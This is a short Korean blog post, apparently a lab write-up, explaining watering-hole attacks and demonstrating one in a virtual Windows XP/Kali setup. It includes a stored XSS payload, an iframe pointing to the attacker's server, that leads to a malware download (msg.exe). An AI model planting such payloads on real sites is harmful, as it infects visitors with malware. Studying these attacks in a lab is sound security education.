워터링홀(Watering Hole) 공격 이란 사자가 먹잇감을 사냥하기위해 물웅덩이(Watering Hole) 근처에서 매복을 하는 형상을 빗대어 만든 이름으로, 특정한 공격대상이 방문할 가능성이 있는 합법적인 사이트에 악성코드를 심어서 그 사이트에 방문하기만 해도 악성코드에 감염됩니다. 보통 제로데이나 원데이를 사용하며, 대표적인 표적공격 입니다.
먼저 희생자(WindowsXP) 가 자주 방문하는 사이트에 XSS취약점을 이용하여 해커의 홈페이지로 리다이렉션하는 악성스크립트를 심습니다.
페이지는 가상으로 열어둔 웹서버이며, 고객센터를 들어가보니 XSS에 취약한 게시판이 있었습니다. <iframe src="http://192.168.57.10:8080"></iframe>스크립트를 추가하여 게시글을 클릭하면 해커의 웹서버가 열리는 iframe 을 추가해주었습니다.
이제 공격자(KALI) 로 이동하여 악성웹페이지를 만들어줍니다.
똑같은 취약점이며, msg.exe 를 다운로드 시킵니다.
희생자가 게시글을 클릭하자마자 익스플로잇 되었습니다.
사실은 msg.exe 가 실행이 되어야 하는데 잘 안되었습니다....
'Security > System Hacking' 카테고리의 다른 글
| APT 공격 실습 (2) - Metasploit 을 이용한 익스플로잇 (0) | 2018.11.11 |
|---|---|
| APT 공격 실습 (1) - 가상 실습환경 구성 (0) | 2018.11.11 |
| [PE파일] 특정 PE파일로부터 Export Table 주소를 구해보자. (0) | 2017.06.04 |
| [BOF] strcpy 와 strncpy 함수의 취약점 (1) | 2017.05.30 |